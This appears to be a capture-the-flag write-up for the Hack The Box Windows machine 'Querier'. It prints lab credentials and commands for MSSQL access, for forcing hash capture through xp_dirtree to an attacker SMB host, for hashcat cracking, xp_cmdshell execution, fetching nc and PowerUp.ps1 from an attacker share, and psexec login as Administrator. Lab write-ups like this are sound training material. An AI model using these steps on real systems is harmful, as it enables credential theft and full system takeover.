HTB | Querier

This is a Windows box. You can find it here.

Skill Learned

• Excel macros

• PowerView

NMAP

IP: 10.10.10.125

nmap scan

Port 139 and 445

smbclient

smbclient

Able to connect to Reports

smbclient Reports

get the file

Currency Volume Report.xlsm

Foothold/shell

It is Microsoft Excel 2007

binwalk -e

found vbaProject.bin in xl folder

cat vbaProject.bin | strings

cat vbaProject.bin | strings

found the username and password we can use this cred to login to mssql (port 1433)

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

select @@Version

select @@Version

To check for permission we have

SELECT * FROM fn_my_permissions(NULL, 'SERVER');

SELECT * FROM fn_my_permissions(NULL, 'SERVER');

I can check out the databases available:

SELECT name FROM master.sys.databases

SELECT name FROM master.sys.databases

Capture Net-NTLMv2

The xp_dirtree command to get it to connect to me over SMB where we will be listening with the responder to capture the Net-NTLMv2.

I’ll use xp_dirtree to load a file, and I’ll tell the DB that the file is in an SMB share on my hosts. The server will try to authenticate to my host, where the responder will collect the Net-NTLMv2.

sudo responder -I tun0

responder

Next, I’ll issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on my host:

xp_dirtree '\10.10.14.8\a';

xp_dirtree '\10.10.14.8\a';

.

on responder we have hashes

hash for mssql-svc

Since it is ntlmv2, we will use -m 5600

hashcat

cracked password

Let's connect with mssql-svc

mssqlclient

We can do cmd execution by using xp_cmdshell

xp_cmdshell whoami

xp_cmdshell whoami

Note, the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I’m using to connect, mssqlclient.py has a built-in command to run a command over xp_cmdshell, so I can just type xp_cmdshell [command].

As mssql-svc, I can enable xp_cmdshell (something I couldn’t do as reporting). Just like running a command, there is an alias to do this in the script. The full commands are (from Microsoft’s documentation (https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017) ):

enable_xp_cmdshell 
xp_cmdshell whoami

WindowsTo get a full shell on the box, there are many ways to go. I’ll host nc on an smb server, and let Windows run it from there.

found user.txt

user.txt

Priv Esc

Let's copy PoweUp.ps1

xcopy \10.10.14.8\share\PowerUp.ps1 .

copying the PowerUp.ps1

powershell -ep bypass 
.\PowerUp.ps1

.\PowerUp.ps1

In the GPP file, we found the Administrator password

Since we have a password we can use psexec

psexec.py administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125

psexec.py administrator

we are in as nt authority\system

root.txt